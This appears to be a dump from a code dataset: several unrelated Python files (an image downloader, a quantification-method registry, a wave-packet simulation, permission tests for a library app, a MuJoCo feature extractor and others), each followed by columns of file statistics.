self._psi_langevin_c = cfg.dtype(order_parameter_Langevin_coefficient)
@property
def vector_potential_Langevin_coefficient(self):
return self._ab_langevin_c
@vector_potential_Langevin_coefficient.setter
def vector_potential_Langevin_coefficient(self, vector_potential_Langevin_coefficient):
assert isinstance(vector_potential_Langevin_coefficient, (np.floating, float, np.integer, int))
self._ab_langevin_c = cfg.dtype(vector_potential_Langevin_coefficient)
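The gauge family used in the setters above, A = [g*y*H, (1-g)*x*H, 0], can be checked numerically: the discrete curl recovers H for any g between 0 and 1. A self-contained numpy sketch (uniform grids here, simplified relative to the staggered a/b grids in the class):

import numpy as np

H, g = 2.5, 0.5
Lx = Ly = 1.0
nx, ny = 64, 64
dx, dy = Lx / (nx - 1), Ly / (ny - 1)
x = np.linspace(0.0, Lx, nx)[:, None]
y = np.linspace(0.0, Ly, ny)[None, :]

Ax = -g * (y - 0.5 * Ly) * H * np.ones((nx, ny))
Ay = (1.0 - g) * (x - 0.5 * Lx) * H * np.ones((nx, ny))

# discrete curl_z = dAy/dx - dAx/dy, as in the external_field getter above
curl = np.diff(Ay, axis=0)[:, :-1] / dx - np.diff(Ax, axis=1)[:-1, :] / dy
print(np.allclose(curl, H))  # True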
| 31.939024
| 132
| 0.616648
| 1,327
| 10,476
| 4.64205
| 0.146948
| 0.073864
| 0.101299
| 0.042857
| 0.388961
| 0.281818
| 0.194643
| 0.125
| 0.121104
| 0.088636
| 0
| 0.007683
| 0.29181
| 10,476
| 327
| 133
| 32.036697
| 0.822618
| 0.134212
| 0
| 0.277778
| 0
| 0
| 0.037704
| 0
| 0
| 0
| 0
| 0.009174
| 0.060606
| 1
| 0.136364
| false
| 0.005051
| 0.020202
| 0.010101
| 0.277778
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ddd3cf7e6c6e22a81fc4f44dcb742ce19a9d4e7a
| 1,570
|
py
|
Python
|
src/2_save_images.py
|
Irio/photoshopped-or-not
|
70ae1a2e7e54003d916b501f8d9e020c13ca6c98
|
[
"MIT"
] | 77
|
2016-07-13T13:36:55.000Z
|
2022-02-25T07:49:38.000Z
|
src/2_save_images.py
|
goldservice2017/FakeImageDetection
|
e7f618989d004e24444854df63d9f1c408d0463f
|
[
"MIT"
] | 1
|
2017-07-11T10:28:36.000Z
|
2017-07-11T10:28:36.000Z
|
src/2_save_images.py
|
goldservice2017/FakeImageDetection
|
e7f618989d004e24444854df63d9f1c408d0463f
|
[
"MIT"
] | 20
|
2016-10-23T14:57:19.000Z
|
2022-03-21T13:32:45.000Z
|
from hashlib import sha256
from helpers import load_dataset
import numpy as np
import os
import pandas as pd
import requests
import sys
import time
import urllib.request
CSV_PATH = sys.argv[1]
URL_COLUMN = sys.argv[2]
PATH = sys.argv[3]
def download_image(url, file_path):
try:
if 'imgur.com' in url:
final_url = requests.get(url).url
if ('//'.join(final_url.split('//')[1:])) == 'i.imgur.com/removed.png':
raise IOError('HTTP Error 404: Not Found')
urllib.request.urlretrieve(url, file_path)
print('+ %s' % url)
except IOError as e:
print('%s - %s' % (url, e), file=sys.stderr)
def url_to_file_name(url):
if url:
file_name = sha256(url.encode('utf-8')).hexdigest()
extension = url.split('.')[-1]
if len(extension) > 4:
return file_name
else:
return '%s.%s' % (file_name, extension)
if not os.path.exists(PATH):
os.mkdir(PATH)
dataset = load_dataset(CSV_PATH)
dataset[URL_COLUMN] = dataset[URL_COLUMN].astype(str).replace({'nan': None})  # np.str alias was removed from numpy
dataset['file_names'] = dataset[URL_COLUMN].map(url_to_file_name)
already_downloaded = dataset['file_names'].isin(os.listdir(PATH))
without_url = dataset[URL_COLUMN].isnull()
remaining_images = dataset[~(already_downloaded | without_url)]
print('Remaining: %i' % len(remaining_images))
for index, values in remaining_images.iterrows():
url = dict(values)[URL_COLUMN]
file_path = '%s/%s' % (PATH, url_to_file_name(url))
time.sleep(1)
download_image(url, file_path)
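What the naming scheme above produces: a deterministic sha256 digest of the URL, which is why re-runs can skip files already on disk. Runnable once the functions above are defined (the argv-driven part of the script aside):

name = url_to_file_name("http://example.com/cat.png")
assert len(name) == 64 + 4 and name.endswith(".png")
# anything without a short extension falls back to the bare digest
assert len(url_to_file_name("http://example.com/image?id=42")) == 64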
| 30.784314
| 83
| 0.66051
| 228
| 1,570
| 4.377193
| 0.390351
| 0.054108
| 0.064128
| 0.039078
| 0.08016
| 0
| 0
| 0
| 0
| 0
| 0
| 0.01346
| 0.195541
| 1,570
| 50
| 84
| 31.4
| 0.776722
| 0
| 0
| 0
| 0
| 0
| 0.078981
| 0.01465
| 0
| 0
| 0
| 0
| 0
| 1
| 0.045455
| false
| 0
| 0.204545
| 0
| 0.295455
| 0.068182
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ddd7b262ec09a987c21172c82cd032e817c1ba5b
| 801
|
py
|
Python
|
quapy/method/__init__.py
|
valgur/QuaPy
|
6b1ba4886a1d64b086829306cbba689cdcfd60e8
|
[
"BSD-3-Clause"
] | 34
|
2021-01-06T14:01:06.000Z
|
2022-03-08T06:59:04.000Z
|
quapy/method/__init__.py
|
valgur/QuaPy
|
6b1ba4886a1d64b086829306cbba689cdcfd60e8
|
[
"BSD-3-Clause"
] | 4
|
2021-06-07T07:45:57.000Z
|
2021-06-21T11:16:10.000Z
|
quapy/method/__init__.py
|
valgur/QuaPy
|
6b1ba4886a1d64b086829306cbba689cdcfd60e8
|
[
"BSD-3-Clause"
] | 6
|
2021-06-07T10:08:17.000Z
|
2022-03-07T13:42:15.000Z
|
from . import aggregative
from . import base
from . import meta
from . import non_aggregative
EXPLICIT_LOSS_MINIMIZATION_METHODS = {
aggregative.ELM,
aggregative.SVMQ,
aggregative.SVMAE,
aggregative.SVMKLD,
aggregative.SVMRAE,
aggregative.SVMNKLD
}
AGGREGATIVE_METHODS = {
aggregative.CC,
aggregative.ACC,
aggregative.PCC,
aggregative.PACC,
aggregative.EMQ,
aggregative.HDy,
aggregative.X,
aggregative.T50,
aggregative.MAX,
aggregative.MS,
aggregative.MS2,
} | EXPLICIT_LOSS_MINIMIZATION_METHODS
NON_AGGREGATIVE_METHODS = {
non_aggregative.MaximumLikelihoodPrevalenceEstimation
}
META_METHODS = {
meta.Ensemble,
meta.QuaNet
}
QUANTIFICATION_METHODS = AGGREGATIVE_METHODS | NON_AGGREGATIVE_METHODS | META_METHODS
| 18.627907
| 85
| 0.741573
| 78
| 801
| 7.397436
| 0.397436
| 0.069324
| 0.109185
| 0.107452
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.004608
| 0.187266
| 801
| 42
| 86
| 19.071429
| 0.88172
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.121212
| 0
| 0.121212
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ddd9ee0a17827daaf5df8b02b71f681e46b3a8a2
| 916
|
py
|
Python
|
OT/test_subplots.py
|
pine2104/Python_for_Lab
|
571398c2422711d8a74f9c95a746537859458557
|
[
"MIT"
] | 5
|
2022-02-03T20:10:21.000Z
|
2022-03-30T08:05:10.000Z
|
OT/test_subplots.py
|
pine2104/Python_for_Lab
|
571398c2422711d8a74f9c95a746537859458557
|
[
"MIT"
] | null | null | null |
OT/test_subplots.py
|
pine2104/Python_for_Lab
|
571398c2422711d8a74f9c95a746537859458557
|
[
"MIT"
] | null | null | null |
from EM_Algorithm.gen_gauss import gen_gauss
from EM_Algorithm.gen_poisson import gen_poisson
import numpy as np
import matplotlib.pyplot as plt
x = gen_gauss([8],[2],[1000])
y = gen_poisson([1],[1000])
fig = plt.figure(figsize=(8, 8))
# Add a gridspec with two rows and two columns and a ratio of 2 to 7 between
# the size of the marginal axes and the main axes in both directions.
# Also adjust the subplot parameters for a square plot.
gs = fig.add_gridspec(2, 2, width_ratios=(7, 2), height_ratios=(2, 7),
left=0.1, right=0.9, bottom=0.1, top=0.9,
wspace=0.05, hspace=0.05)
ax = fig.add_subplot(gs[1, 0])
ax.scatter(x, y)
ax_histx = fig.add_subplot(gs[0, 0], sharex=ax)
ax_histy = fig.add_subplot(gs[1, 1], sharey=ax)
ax_histx.hist(x, bins=10, color='grey', edgecolor="white")
ax_histy.hist(y, bins=10, orientation='horizontal', color='grey', edgecolor="white")
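Two optional follow-up calls, assuming the ax_histx/ax_histy axes from the script above; they hide the tick labels that the marginal plots duplicate from the main axes, as in the matplotlib scatter-histogram gallery example this script mirrors:

ax_histx.tick_params(axis='x', labelbottom=False)  # x labels already shown by the main axes
ax_histy.tick_params(axis='y', labelleft=False)    # y labels already shown by the main axes
plt.show()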
| 35.230769
| 84
| 0.689956
| 166
| 916
| 3.698795
| 0.46988
| 0.039088
| 0.063518
| 0.07329
| 0.052117
| 0
| 0
| 0
| 0
| 0
| 0
| 0.059289
| 0.171397
| 916
| 25
| 85
| 36.64
| 0.749671
| 0.213974
| 0
| 0
| 0
| 0
| 0.039161
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.25
| 0
| 0.25
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ddda6ce0c1f2ddd975f7aba52a0da244fa436a75
| 2,114
|
py
|
Python
|
code/examples/VsevolodTymofyeyev2/example.py
|
TrackerSB/MasterThesis
|
2792203d28d6c7b62f54545344ee6772d2ec5b64
|
[
"MIT"
] | null | null | null |
code/examples/VsevolodTymofyeyev2/example.py
|
TrackerSB/MasterThesis
|
2792203d28d6c7b62f54545344ee6772d2ec5b64
|
[
"MIT"
] | null | null | null |
code/examples/VsevolodTymofyeyev2/example.py
|
TrackerSB/MasterThesis
|
2792203d28d6c7b62f54545344ee6772d2ec5b64
|
[
"MIT"
] | null | null | null |
import os
from threading import Thread
from typing import List
from aiExchangeMessages_pb2 import SimulationID, TestResult
def _handle_vehicle(sid: SimulationID, vid: str, requests: List[str]) -> None:
vid_obj = VehicleID()
vid_obj.vid = vid
i = 0
while i < 3:
i += 1
print(sid.sid + ": Test status: " + service.get_status(sid))
print(vid + ": Wait")
sim_state = service.wait_for_simulator_request(sid, vid_obj) # wait()
if sim_state is SimStateResponse.SimState.RUNNING:
print(vid + ": Request data")
request = DataRequest()
request.request_ids.extend(requests)
data = service.request_data(sid, vid_obj, request) # request()
print(data)
print(vid + ": Wait for control")
control = Control()
control.avCommand.accelerate = 1
service.control(sid, vid_obj, control)
else:
print(sid.sid + ": The simulation is not running anymore (State: "
+ SimStateResponse.SimState.Name(sim_state) + ").")
print(sid.sid + ": Final result: " + service.get_result(sid))
break
sim_state = service.wait_for_simulator_request(sid, vid_obj) # wait()
if sim_state is SimStateResponse.SimState.RUNNING:
result = TestResult()
result.result = TestResult.Result.FAILED
service.control_sim(sid, result)
if __name__ == "__main__":
from AIExchangeService import get_service
from aiExchangeMessages_pb2 import SimStateResponse, Control, SimulationID, VehicleID, DataRequest
service = get_service()
# Send tests
sids = service.run_tests("test", "test", "xmls/criteriaA.dbc.xml", "xmls/environmentA.dbe.xml")
# -> Response status: 500
print("Tests sent")
# Interact with a simulation
if not sids:
exit(1)
sid = SimulationID()
sid.sid = sids.sids[0]
ego_requests = ["egoSpeed"]
ego_vehicle = Thread(target=_handle_vehicle, args=(sid, "ego", ego_requests))
ego_vehicle.start()
ego_vehicle.join()
| 33.555556
| 102
| 0.638127
| 247
| 2,114
| 5.279352
| 0.340081
| 0.027607
| 0.027607
| 0.047546
| 0.15184
| 0.15184
| 0.096626
| 0.096626
| 0.096626
| 0.096626
| 0
| 0.006993
| 0.255913
| 2,114
| 62
| 103
| 34.096774
| 0.821996
| 0.040208
| 0
| 0.042553
| 0
| 0
| 0.100396
| 0.023244
| 0
| 0
| 0
| 0
| 0
| 1
| 0.021277
| false
| 0
| 0.12766
| 0
| 0.148936
| 0.170213
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
dddd2ef86d68662ac04401af3b7b61b4ab5cb9ed
| 1,916
|
py
|
Python
|
rfap.py
|
anabanami/RFAP
|
09b434d115ae1872810d65126bcbc9d7af510e89
|
[
"MIT"
] | null | null | null |
rfap.py
|
anabanami/RFAP
|
09b434d115ae1872810d65126bcbc9d7af510e89
|
[
"MIT"
] | null | null | null |
rfap.py
|
anabanami/RFAP
|
09b434d115ae1872810d65126bcbc9d7af510e89
|
[
"MIT"
] | null | null | null |
# PHS3350
# Week 2 - wave packet and RFAP -
# "what I cannot create I cannot understand" - R. Feynman.
# Ana Fabela Hinojosa, 13/03/2021
import os
from pathlib import Path
import numpy as np
import matplotlib
import matplotlib.pyplot as plt
import physunits
from scipy.fft import fft, ifft
plt.rcParams['figure.dpi'] = 200
folder = Path('wavepacket_time_evolution')
os.makedirs(folder, exist_ok=True)
os.system(f'rm {folder}/*.png')
# hbar = 1.0545718e-34 # [Js]
hbar = 1
m = 1
𝜎 = 1
x_max = 10
x = np.linspace(-x_max, x_max, 1024, endpoint=False)
n = x.size
x_step = x[1] - x[0]
# oscillations per unit of space
k0 = 2 * np.pi / x_max * 5
# For Fourier space
k = 2 * np.pi * np.fft.fftfreq(n, x_step)
wave = np.exp(- x**2 / (2*𝜎**2)) * np.exp(1j*k0*x)
# Square well potential
sw = np.zeros_like(x)
# depth
sw[0] = sw[-1] = 1000*k0**2
# Schrodinger equation (or first order time derivative)
def Schrodinger_eqn(t, Ψ):
r = np.linspace(0, x_max, 1024, endpoint=False)
KΨ = -hbar**2/(2 * m) * ifft(-(k**2) * fft(Ψ))
VΨ = sw * Ψ
# I dunno #+ (-1j / hbar) * 1j*x**3 * Ψ
return (-1j / hbar) * (KΨ + VΨ)
def Runge_Kutta(t, delta_t, Ψ):
k1 = Schrodinger_eqn(t, Ψ)
k2 = Schrodinger_eqn(t + delta_t / 2, Ψ + k1 * delta_t / 2)
k3 = Schrodinger_eqn(t + delta_t / 2, Ψ + k2 * delta_t / 2)
k4 = Schrodinger_eqn(t + delta_t, Ψ + k3 * delta_t)
return Ψ + (delta_t / 6) * (k1 + 2 * k2 + 2 * k3 + k4)
i = 0
t = 0
t_final = 5
delta_t = 0.0001
while t < t_final:
if not i % 400:
plt.plot(x, np.real(wave), label="real part")
plt.plot(x, np.imag(wave), label="imaginary part")
plt.xlim(-x_max, x_max)
plt.legend()
plt.xlabel("x")
plt.title(f"wave packet t = {i}")
plt.savefig(folder/f'{i:04d}.png')
# plt.show()
plt.clf()
wave = Runge_Kutta(t, delta_t, wave)
i += 1
t += delta_t
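The Runge_Kutta function above is the classic fourth-order scheme; a minimal, dependency-light check of the same stepping pattern on dy/dt = -y, whose exact solution is exp(-t):

import math

def f(t, y):
    return -y  # dy/dt = -y

def rk4_step(t, dt, y):
    k1 = f(t, y)
    k2 = f(t + dt / 2, y + k1 * dt / 2)
    k3 = f(t + dt / 2, y + k2 * dt / 2)
    k4 = f(t + dt, y + k3 * dt)
    return y + (dt / 6) * (k1 + 2 * k2 + 2 * k3 + k4)

y, t, dt = 1.0, 0.0, 0.01
while t < 1.0:
    y = rk4_step(t, dt, y)
    t += dt
print(abs(y - math.exp(-1.0)))  # on the order of 1e-10, consistent with 4th-order accuracy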
| 23.95
| 64
| 0.598643
| 338
| 1,916
| 3.295858
| 0.39645
| 0.059246
| 0.037702
| 0.05386
| 0.128366
| 0.041293
| 0.041293
| 0
| 0
| 0
| 0
| 0.067586
| 0.243215
| 1,916
| 79
| 65
| 24.253165
| 0.70069
| 0.174843
| 0
| 0
| 0
| 0
| 0.067732
| 0.015974
| 0
| 0
| 0
| 0
| 0
| 1
| 0.039216
| false
| 0
| 0.137255
| 0
| 0.215686
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
dde27c4c382b986590140f153b007830bdfd2e36
| 3,725
|
py
|
Python
|
tests/api/test_record_permissions.py
|
equadon/invenio-app-ils
|
42ba282968d0aa28fb1bfc71d0709685165aaec4
|
[
"MIT"
] | null | null | null |
tests/api/test_record_permissions.py
|
equadon/invenio-app-ils
|
42ba282968d0aa28fb1bfc71d0709685165aaec4
|
[
"MIT"
] | null | null | null |
tests/api/test_record_permissions.py
|
equadon/invenio-app-ils
|
42ba282968d0aa28fb1bfc71d0709685165aaec4
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
#
# Copyright (C) 2018-2019 CERN.
#
# invenio-app-ils is free software; you can redistribute it and/or modify it
# under the terms of the MIT License; see LICENSE file for more details.
"""Test record permissions."""
from __future__ import unicode_literals
import uuid
import pytest
from flask_principal import RoleNeed, identity_loaded
from flask_security import login_user
from invenio_access.models import ActionRoles
from invenio_accounts.models import Role, User
from invenio_records.api import Record
from invenio_app_ils.records.permissions import RecordPermission, \
create_records_action
@pytest.mark.parametrize(
"access,action,is_allowed",
[
({"foo": "bar"}, "read", True),
({"foo": "bar"}, "update", False),
({"_access": {"read": [1]}}, "read", True),
({"_access": {"read": [2]}}, "read", False),
({"_access": {"read": ["records-readers"]}}, "read", True),
# permission for specific user to create
({"_access": {"update": [1]}}, "update", True),
# checks if the access works for different actions
({"_access": {"update": [1]}}, "create", False),
({"_access": {"delete": [1]}}, "update", False),
# delete access for user and librarian
({"_access": {"delete": [1, "librarian"]}}, "delete", True),
],
)
def test_record_generic_access(db, users, with_access, access, action,
is_allowed):
"""Test access control for records."""
@identity_loaded.connect
def mock_identity_provides(sender, identity):
"""Provide additional role to the user."""
roles = [RoleNeed("records-readers")]
# Gives the user additional roles, e.g. based on their groups
identity.provides |= set(roles)
def login_and_test(user_id):
login_user(User.query.get(user_id))
# Create record
user = User.query.get(user_id)
id = uuid.uuid4()
record = Record.create(access, id_=id)
factory = RecordPermission(record, action)
if user.has_role("admin"):
# super user can do EVERYTHING
assert factory.can()
elif user.has_role("librarian") and action != "delete":
# librarian should be able to update, create, and read everything
assert factory.can()
else:
assert factory.can() if is_allowed else not factory.can()
# Test standard user
login_and_test(users["patron1"].id)
# Test librarian access
login_and_test(users["librarian"].id)
# Test superuser access
login_and_test(users["admin"].id)
@pytest.mark.parametrize(
"access,action,is_allowed",
[
({"foo": "bar"}, "create", True),
({"foo": "bar"}, "update", False),
({"foo": "bar"}, "delete", False),
],
)
def test_record_patron_create(db, users, access, action, is_allowed):
"""Test patron create."""
# create role to be able to create records
role = Role(name="records-creators")
db.session.add(role)
db.session.commit()
# assign role to the action "create-records"
ar = ActionRoles.allow(create_records_action, role_id=role.id)
db.session.add(ar)
db.session.commit()
@identity_loaded.connect
def mock_identity_provides(sender, identity):
"""Provide additional role to the user."""
roles = [RoleNeed(role.name)]
# Gives the user additional roles, e.g. based on their groups
identity.provides |= set(roles)
login_user(users["patron1"])
id = uuid.uuid4()
record = Record.create(access, id_=id)
factory = RecordPermission(record, action)
assert factory.can() if is_allowed else not factory.can()
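A minimal, self-contained illustration of the @pytest.mark.parametrize pattern these tests rely on (the permission rule here is a toy, not invenio's):

import pytest

@pytest.mark.parametrize('access,action,is_allowed', [
    ({'_access': {'read': [1]}}, 'read', True),
    ({'_access': {'read': [2]}}, 'read', False),
])
def test_toy_permission(access, action, is_allowed):
    # toy rule: user 1 is allowed if listed; actions without an _access entry default to allowed
    allowed = 1 in access.get('_access', {}).get(action, [1])
    assert allowed if is_allowed else not allowed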
| 33.863636
| 77
| 0.633289
| 458
| 3,725
| 5.015284
| 0.28821
| 0.023509
| 0.02438
| 0.036569
| 0.371789
| 0.311711
| 0.292556
| 0.292556
| 0.292556
| 0.250762
| 0
| 0.006618
| 0.229262
| 3,725
| 109
| 78
| 34.174312
| 0.793452
| 0.226846
| 0
| 0.376812
| 0
| 0
| 0.116361
| 0.016925
| 0
| 0
| 0
| 0
| 0.057971
| 1
| 0.072464
| false
| 0
| 0.130435
| 0
| 0.202899
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
dde28d401374fdc16a1d1b838ec6fd235235e1cc
| 945
|
py
|
Python
|
src/Index.py
|
bhed01/bhed01.github.io
|
132cf8e4afa05a00d71555afa2002a2d50c304c8
|
[
"MIT"
] | 3
|
2020-10-16T12:26:31.000Z
|
2022-02-03T18:06:35.000Z
|
src/Index.py
|
bhed01/bhed01.github.io
|
132cf8e4afa05a00d71555afa2002a2d50c304c8
|
[
"MIT"
] | null | null | null |
src/Index.py
|
bhed01/bhed01.github.io
|
132cf8e4afa05a00d71555afa2002a2d50c304c8
|
[
"MIT"
] | null | null | null |
from .components.Head import Head
from .components.NavIcons import Hamburger
from .components.Screens import HomeScreen, AboutScreen, ProjectsScreen
from .components.Footer import Footer
from .utils import JSON_DIR
from json import load
import os
def Index():
with open(os.path.join(JSON_DIR, 'home_data.json')) as hFile:
home_data = load(hFile)
with open(os.path.join(JSON_DIR, 'about_data.json')) as aFile:
about_data = load(aFile)
with open(os.path.join(JSON_DIR, 'projects_data.json')) as pFile:
projects = load(pFile)['projects']
with open(os.path.join(JSON_DIR, 'footer_data.json')) as fFile:
footer_data = load(fFile)
return Head(
title='Portfolio - Bhed',
children=f'''
{Hamburger()}
{HomeScreen(**home_data)}
{AboutScreen(**about_data)}
{ProjectsScreen(projects)}
{Footer(**footer_data)}'''
)
| 32.586207
| 72
| 0.649735
| 118
| 945
| 5.076271
| 0.313559
| 0.058431
| 0.066778
| 0.093489
| 0.166945
| 0.166945
| 0.166945
| 0
| 0
| 0
| 0
| 0
| 0.22963
| 945
| 28
| 73
| 33.75
| 0.822802
| 0
| 0
| 0
| 0
| 0
| 0.268266
| 0.110142
| 0
| 0
| 0
| 0
| 0
| 1
| 0.04
| false
| 0
| 0.28
| 0
| 0.36
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
dde2faa4056b42852281bc2be32673929adfef2b
| 5,190
|
py
|
Python
|
bisk/features/base.py
|
facebookresearch/bipedal-skills
|
edd424a8779e3a0121fb995cad00839d8226cf46
|
[
"MIT"
] | 6
|
2021-11-05T16:57:58.000Z
|
2022-03-16T10:34:46.000Z
|
bisk/features/base.py
|
facebookresearch/bipedal-skills
|
edd424a8779e3a0121fb995cad00839d8226cf46
|
[
"MIT"
] | null | null | null |
bisk/features/base.py
|
facebookresearch/bipedal-skills
|
edd424a8779e3a0121fb995cad00839d8226cf46
|
[
"MIT"
] | 1
|
2021-11-05T16:57:47.000Z
|
2021-11-05T16:57:47.000Z
|
# Copyright (c) 2021-present, Facebook, Inc.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
#
import logging
from typing import Dict, List
import gym
import numpy as np
from dm_control import mujoco
from dm_control.mujoco.wrapper.mjbindings import enums as mjenums
from dm_control.mujoco.wrapper.mjbindings import mjlib
log = logging.getLogger(__name__)
class Featurizer:
n_qpos: Dict[int, int] = { # qpos entries per joint type
mjenums.mjtJoint.mjJNT_FREE: 7,
mjenums.mjtJoint.mjJNT_BALL: 4,
mjenums.mjtJoint.mjJNT_SLIDE: 1,
mjenums.mjtJoint.mjJNT_HINGE: 1,
}
n_qvel: Dict[int, int] = { # qvel entries per joint type
mjenums.mjtJoint.mjJNT_FREE: 6,
mjenums.mjtJoint.mjJNT_BALL: 3,
mjenums.mjtJoint.mjJNT_SLIDE: 1,
mjenums.mjtJoint.mjJNT_HINGE: 1,
}
def __init__(
self,
p: mujoco.Physics,
robot: str,
prefix: str = 'robot',
exclude: str = None,
):
self.p = p
self.prefix = prefix
self.observation_space: gym.spaces.Box = None
def __call__(self) -> np.ndarray:
raise NotImplementedError()
def set_frame_of_reference(self):
raise NotImplementedError()
def feature_names(self) -> List[str]:
raise NotImplementedError()
def qpos_names(self) -> List[str]:
names = ['' for i in range(len(self.p.data.qpos))]
for jn in self.p.named.model.jnt_type.axes.row.names:
typ = self.p.named.model.jnt_type[jn]
adr = self.p.named.model.jnt_qposadr[jn]
if typ == 0:
names[adr + 0] = f'{jn}:px'
names[adr + 1] = f'{jn}:py'
names[adr + 2] = f'{jn}:pz'
names[adr + 3] = f'{jn}:ow'
names[adr + 4] = f'{jn}:ox'
names[adr + 5] = f'{jn}:oy'
names[adr + 6] = f'{jn}:oz'
elif typ == 1:
names[adr + 0] = f'{jn}:ow'
names[adr + 1] = f'{jn}:ox'
names[adr + 2] = f'{jn}:oy'
names[adr + 3] = f'{jn}:oz'
elif typ == 2 or typ == 3:
names[adr] = f'{jn}:p'
else:
raise ValueError(f'Unknown joint type {typ}')
return names
def qvel_names(self) -> List[str]:
names = ['' for i in range(len(self.p.data.qvel))]
for jn in self.p.named.model.jnt_type.axes.row.names:
typ = self.p.named.model.jnt_type[jn]
adr = self.p.named.model.jnt_dofadr[jn]
if typ == 0:
names[adr + 0] = f'{jn}:lvx'
names[adr + 1] = f'{jn}:lvy'
names[adr + 2] = f'{jn}:lvz'
names[adr + 3] = f'{jn}:avx'
names[adr + 4] = f'{jn}:avy'
names[adr + 5] = f'{jn}:avz'
elif typ == 1:
names[adr + 0] = f'{jn}:avx'
names[adr + 1] = f'{jn}:avy'
names[adr + 2] = f'{jn}:avz'
elif typ == 2 or typ == 3:
names[adr] = f'{jn}:v'
else:
raise ValueError(f'Unknown joint type {typ}')
return names
def cfrc_ext_names(self) -> List[List[str]]:
names: List[List[str]] = []
for cn in self.p.named.data.cfrc_ext.axes.row.names:
names.append(
[f'{cn}:c{n}' for n in ['rx', 'ry', 'rz', 'tx', 'ty', 'tz']]
)
return names
def sensor_names(self) -> List[str]:
names = ['' for i in range(len(self.p.data.sensordata))]
for sn in self.p.named.model.sensor_adr.axes.row.names:
typ = self.p.named.model.sensor_type[sn]
adr = self.p.named.model.sensor_adr[sn]
if typ == mjenums.mjtSensor.mjSENS_GYRO:
feats = ['avx', 'avy', 'avz']
elif (
typ == mjenums.mjtSensor.mjSENS_VELOCIMETER
or typ == mjenums.mjtSensor.mjSENS_SUBTREELINVEL
):
feats = ['lvx', 'lvy', 'lvz']
elif typ == mjenums.mjtSensor.mjSENS_ACCELEROMETER:
feats = ['lax', 'lay', 'laz']
elif (
typ == mjenums.mjtSensor.mjSENS_FRAMEPOS
or typ == mjenums.mjtSensor.mjSENS_SUBTREECOM
):
feats = ['px', 'py', 'pz']
elif typ == mjenums.mjtSensor.mjSENS_JOINTPOS:
feats = ['']
elif typ == mjenums.mjtSensor.mjSENS_JOINTVEL:
feats = ['']
elif typ == mjenums.mjtSensor.mjSENS_FORCE:
feats = ['fx', 'fy', 'fz']
elif typ == mjenums.mjtSensor.mjSENS_TORQUE:
feats = ['tx', 'ty', 'tz']
elif typ == mjenums.mjtSensor.mjSENS_RANGEFINDER:
feats = ['d']
elif typ == mjenums.mjtSensor.mjSENS_TOUCH:
feats = ['f']
else:
raise ValueError(f'Unsupported sensor type: {typ}')
for i, f in enumerate(feats):
names[adr + i] = f'{sn}:{f}'
return names
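For reference, the n_qpos/n_qvel tables at the top of the class encode MuJoCo's standard per-joint state widths; a dependency-free sanity check of those numbers:

# MuJoCo per-joint state widths, mirrored from the class attributes above
N_QPOS = {'free': 7, 'ball': 4, 'slide': 1, 'hinge': 1}
N_QVEL = {'free': 6, 'ball': 3, 'slide': 1, 'hinge': 1}
# a free joint stores an xyz position plus a wxyz quaternion (7 qpos entries)
# but only 6 velocity degrees of freedom (3 linear + 3 angular)
assert N_QPOS['free'] == 3 + 4 and N_QVEL['free'] == 3 + 3
# a ball joint is a pure quaternion orientation with 3 angular velocity entries
assert N_QPOS['ball'] == 4 and N_QVEL['ball'] == 3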
| 36.293706
| 76
| 0.511753
| 651
| 5,190
| 3.99232
| 0.25192
| 0.070796
| 0.087726
| 0.115429
| 0.56137
| 0.371681
| 0.327049
| 0.294729
| 0.234706
| 0.219315
| 0
| 0.011912
| 0.352987
| 5,190
| 142
| 77
| 36.549296
